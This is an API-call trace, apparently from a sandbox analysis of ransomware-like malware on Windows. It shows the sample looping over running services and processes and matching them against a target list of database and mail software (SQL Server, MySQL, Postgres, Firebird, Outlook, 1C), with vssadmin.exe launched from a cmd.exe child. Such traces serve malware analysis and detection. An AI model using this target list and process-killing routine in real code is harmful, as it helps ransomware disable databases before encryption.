	[0043.977] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0043.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0043.977] lstrlenW (lpString="Winmgmt") returned 7
	[0043.977] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0043.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0043.977] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0043.977] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0043.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0043.977] lstrlenW (lpString="WPDBusEnum") returned 10
	[0043.977] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0043.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0043.977] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0043.977] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0043.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0043.977] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4b70c0 | out: hHeap=0x7d60000) returned 1
	[0043.977] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cc
	[0043.982] Process32FirstW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0043.982] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0043.983] lstrlenW (lpString="System") returned 6
	[0043.983] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0043.983] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0043.983] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0043.983] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0043.983] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0043.984] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0043.984] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0043.984] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0043.984] lstrlenW (lpString="smss.exe") returned 8
	[0043.984] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0043.984] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0043.984] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0043.984] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0043.984] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0043.984] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0043.984] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0043.984] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0043.985] lstrlenW (lpString="csrss.exe") returned 9
	[0043.985] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0043.985] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0043.985] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0043.985] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0043.985] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0043.985] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0043.985] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0043.985] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0043.985] lstrlenW (lpString="wininit.exe") returned 11
	[0043.985] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0043.985] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0043.985] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0043.986] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0043.986] lstrlenW (lpString="csrss.exe") returned 9
	[0043.986] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0043.986] lstrlenW (lpString="winlogon.exe") returned 12
	[0043.986] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0043.987] lstrlenW (lpString="services.exe") returned 12
	[0043.987] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0043.987] lstrlenW (lpString="lsass.exe") returned 9
	[0043.987] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0043.988] lstrlenW (lpString="lsm.exe") returned 7
	[0043.988] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0043.988] lstrlenW (lpString="svchost.exe") returned 11
	[0043.988] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0043.989] lstrlenW (lpString="svchost.exe") returned 11
	[0043.989] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0043.989] lstrlenW (lpString="svchost.exe") returned 11
	[0043.989] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0043.990] lstrlenW (lpString="svchost.exe") returned 11
	[0043.990] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0043.990] lstrlenW (lpString="svchost.exe") returned 11
	[0043.990] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0043.991] lstrlenW (lpString="audiodg.exe") returned 11
	[0043.991] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0043.991] lstrlenW (lpString="svchost.exe") returned 11
	[0043.991] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0043.992] lstrlenW (lpString="svchost.exe") returned 11
	[0043.992] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0043.992] lstrlenW (lpString="dwm.exe") returned 7
	[0043.992] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0043.992] lstrlenW (lpString="explorer.exe") returned 12
	[0043.993] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0043.993] lstrlenW (lpString="spoolsv.exe") returned 11
	[0043.993] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0043.993] lstrlenW (lpString="taskhost.exe") returned 12
	[0043.993] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0043.994] lstrlenW (lpString="svchost.exe") returned 11
	[0043.994] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0043.994] lstrlenW (lpString="taskeng.exe") returned 11
	[0043.994] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0043.995] lstrlenW (lpString="taskhost.exe") returned 12
	[0043.995] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0043.995] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0043.995] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0043.996] lstrlenW (lpString="python tragedy.exe") returned 18
	[0043.996] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0043.996] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0043.996] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0043.997] lstrlenW (lpString="computers.exe") returned 13
	[0043.997] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0043.997] lstrlenW (lpString="separated.exe") returned 13
	[0043.997] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0043.997] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0043.998] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0043.998] lstrlenW (lpString="darkness.exe") returned 12
	[0043.998] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0043.998] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0043.998] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0043.999] lstrlenW (lpString="sophisticated.exe") returned 17
	[0043.999] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0043.999] lstrlenW (lpString="wishlist.exe") returned 12
	[0043.999] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0044.000] lstrlenW (lpString="top.exe") returned 7
	[0044.000] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0044.000] lstrlenW (lpString="implemented.exe") returned 15
	[0044.000] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0044.001] lstrlenW (lpString="comp.exe") returned 8
	[0044.001] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0044.001] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0044.001] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0044.002] lstrlenW (lpString="solved.exe") returned 10
	[0044.002] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0044.002] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0044.002] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0044.004] lstrlenW (lpString="trips.exe") returned 9
	[0044.004] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0044.004] lstrlenW (lpString="tumormanual.exe") returned 15
	[0044.004] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0044.005] lstrlenW (lpString="telecom.exe") returned 11
	[0044.005] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0044.286] lstrlenW (lpString="realistic.exe") returned 13
	[0044.290] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0044.302] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0044.307] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0044.309] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0044.309] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0044.309] lstrlenW (lpString="cmd.exe") returned 7
	[0044.309] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0044.310] lstrlenW (lpString="conhost.exe") returned 11
	[0044.310] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0044.310] lstrlenW (lpString="vssadmin.exe") returned 12
	[0044.310] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0044.311] lstrlenW (lpString="VSSVC.exe") returned 9
	[0044.311] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0044.311] lstrlenW (lpString="svchost.exe") returned 11
	[0044.311] Process32NextW (in: hSnapshot=0x1cc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0044.312] CloseHandle (hObject=0x1cc) returned 1
	[0044.312] Sleep (dwMilliseconds=0x1f4) 
	[0045.093] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7df3058
	[0045.094] EnumServicesStatusExW (in: hSCManager=0x7df3058, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0045.094] GetLastError () returned 0xea
	[0045.094] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x12c6) returned 0xb4b70c0
	[0045.094] EnumServicesStatusExW (in: hSCManager=0x7df3058, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb4b70c0, cbBufSize=0x12c6, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb4b70c0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0045.095] CloseServiceHandle (hSCObject=0x7df3058) returned 1
	[0045.095] lstrlenW (lpString="Appinfo") returned 7
	[0045.095] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0045.095] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0045.095] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0045.095] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0045.095] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0045.095] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0045.095] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0045.095] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0045.095] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0045.095] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0045.095] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0045.095] lstrlenW (lpString="AudioSrv") returned 8
	[0045.095] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0045.095] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0045.095] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0045.095] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0045.095] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0045.095] lstrlenW (lpString="BFE") returned 3
	[0045.096] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0045.096] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0045.096] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0045.096] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0045.096] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0045.096] lstrlenW (lpString="CryptSvc") returned 8
	[0045.096] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0045.096] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0045.096] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
